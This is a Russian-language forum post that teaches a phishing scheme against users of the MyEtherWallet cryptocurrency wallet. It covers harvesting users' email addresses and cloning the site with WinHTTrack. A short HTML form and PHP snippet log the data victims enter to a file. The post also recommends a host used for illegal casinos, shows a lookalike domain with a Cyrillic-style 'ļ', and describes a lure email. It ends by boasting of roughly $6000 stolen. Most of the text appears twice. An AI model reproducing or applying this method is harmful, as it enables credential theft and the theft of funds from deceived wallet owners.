Nirvanax0x0
Опытный user
- Регистрация
- 13 Авг 2022
- Сообщения
- 146
- Реакции
- 3
Внимание! Обращаем ваше внимание на то, что статья написана исключительно в ознакомительных и образовательных целях и не является инструкцией к действию. Автор не несёт ответственности за любой возможный вред, причиненный материалами данной статьи.
В чём суть?
Суть до боли проста - элементарный фишинг, но красиво, я бы даже сказал, образцово упакованный. Все гениальное - просто.
Работать будем с англо-язычной аудиторией, т. к. она не ищет везде подвох, ведь в отличии от наших людей их никто не пытается наебать на каждом шагу.
Для начала нужно собрать базу email адресов пользователей сайта - myetherwallet.com.
Для тех, кто не в курсе - это кошелек для криптовалюты Ethereum.
[obgreen]
Суть будет заключаться в email рассылке по полученной нами базе данных пользователей.
Письмо будет мотивировать пользователей перейти на сайт, который будет являться точной копией оригинального.
Начнём с сайта
Для начала нам необходимо создать точную копию оригинального сайта, для этого воспользуемся программой WinHTTrack WebSite Copier
Сложного ничего нет, вставляем адрес сайта и на выходе получаем папку сайта, открыть который можно нажав на файл index.html.
Далее нам необходимо немного подредактировать html код, что бы данные, которые пользователь будет вводить на нашем клоне сохранялись в единый файл.
Сделать это можно добавив следующий код:[/obgreen]
Как видите, сложного ничего нет.
Теперь немного измененный сайт необходимо залить на хостинг. Советуем blitz-host.com (не реклама). Именно на нем крутятся различные нелегальные казино и прочее. Но про свою анонимность все равно забывать не стоит!
Залить сайт на хостинг можно через бесплатную программу FileZilla.
Расписывать процесс не имеет смысла, т. к. по запросу в гугле вам предоставят миллионы одних и тех же инструкций.
[obgreen]
Теперь переходим к самому интересному - домену.
Для тех, кто не в курсе: доменное имя — символьное имя сайта, то самое, что вы вводите в адресной строке.
Домен необходимо регать максимально похожий на ориг.[/obgreen]
Оригинальный домен такой:
www.myetherwallet.com
Такой домен мы сделаем:
www.myetherwaļlet.com
Заметили разницу?
Вся соль в не совсем обычной букве "L".
Вместо обычной l - ļ.
Вот такой вот маленький секрет, на который практически никто не обратит внимание.
Сайт готов!
Письмо
Рассылать письмо нужно такого вида, который и в оригинале, но с доменом, который вы сделаете.
https://imgur.com/a/pTF3IFe
Итого
Был когда-то похожий фишинг, он был похож на сегодняшний, но с другой заменённой буквой в домене, тот человек, который его организовал, поделился результатами.
Некоторые кошельки оказались и вовсе пустыми, на некоторых были небольшие суммы (10-25$).
Но с двумя крупно подвезло:
2894$ и 2578$.
После того как он прошёлся по остальным кошелям и собрал сумму гораздо поменьше, у него вышел итог - 6000$ или 437.000₽.
В чём суть?
Суть до боли проста - элементарный фишинг, но красиво, я бы даже сказал, образцово упакованный. Все гениальное - просто.
Работать будем с англо-язычной аудиторией, т. к. она не ищет везде подвох, ведь в отличии от наших людей их никто не пытается наебать на каждом шагу.
Для начала нужно собрать базу email адресов пользователей сайта - myetherwallet.com.
Для тех, кто не в курсе - это кошелек для криптовалюты Ethereum.
[obgreen]
Суть будет заключаться в email рассылке по полученной нами базе данных пользователей.
Письмо будет мотивировать пользователей перейти на сайт, который будет являться точной копией оригинального.
Начнём с сайта
Для начала нам необходимо создать точную копию оригинального сайта, для этого воспользуемся программой WinHTTrack WebSite Copier
Сложного ничего нет, вставляем адрес сайта и на выходе получаем папку сайта, открыть который можно нажав на файл index.html.
Далее нам необходимо немного подредактировать html код, что бы данные, которые пользователь будет вводить на нашем клоне сохранялись в единый файл.
Сделать это можно добавив следующий код:[/obgreen]
Код:
<form method="post" action="rec.php"><textarea rows="2" cols="20" name="1"> </textarea><input type="submit" value="Записать"></form>rec.php1<?phpif ($_POST['1']);$file=fopen('1.txt','a+');fputs($file,$_POST['1']);fclose($file);echo 'форма';?>Теперь немного измененный сайт необходимо залить на хостинг. Советуем blitz-host.com (не реклама). Именно на нем крутятся различные нелегальные казино и прочее. Но про свою анонимность все равно забывать не стоит!
Залить сайт на хостинг можно через бесплатную программу FileZilla.
Расписывать процесс не имеет смысла, т. к. по запросу в гугле вам предоставят миллионы одних и тех же инструкций.
[obgreen]
Теперь переходим к самому интересному - домену.
Для тех, кто не в курсе: доменное имя — символьное имя сайта, то самое, что вы вводите в адресной строке.
Домен необходимо регать максимально похожий на ориг.[/obgreen]
Оригинальный домен такой:
www.myetherwallet.com
Такой домен мы сделаем:
www.myetherwaļlet.com
Заметили разницу?
Вся соль в не совсем обычной букве "L".
Вместо обычной l - ļ.
Вот такой вот маленький секрет, на который практически никто не обратит внимание.
Сайт готов!
Письмо
Рассылать письмо нужно такого вида, который и в оригинале, но с доменом, который вы сделаете.
https://imgur.com/a/pTF3IFe
Итого
Был когда-то похожий фишинг, он был похож на сегодняшний, но с другой заменённой буквой в домене, тот человек, который его организовал, поделился результатами.
Некоторые кошельки оказались и вовсе пустыми, на некоторых были небольшие суммы (10-25$).
Но с двумя крупно подвезло:
2894$ и 2578$.
После того как он прошёлся по остальным кошелям и собрал сумму гораздо поменьше, у него вышел итог - 6000$ или 437.000₽.
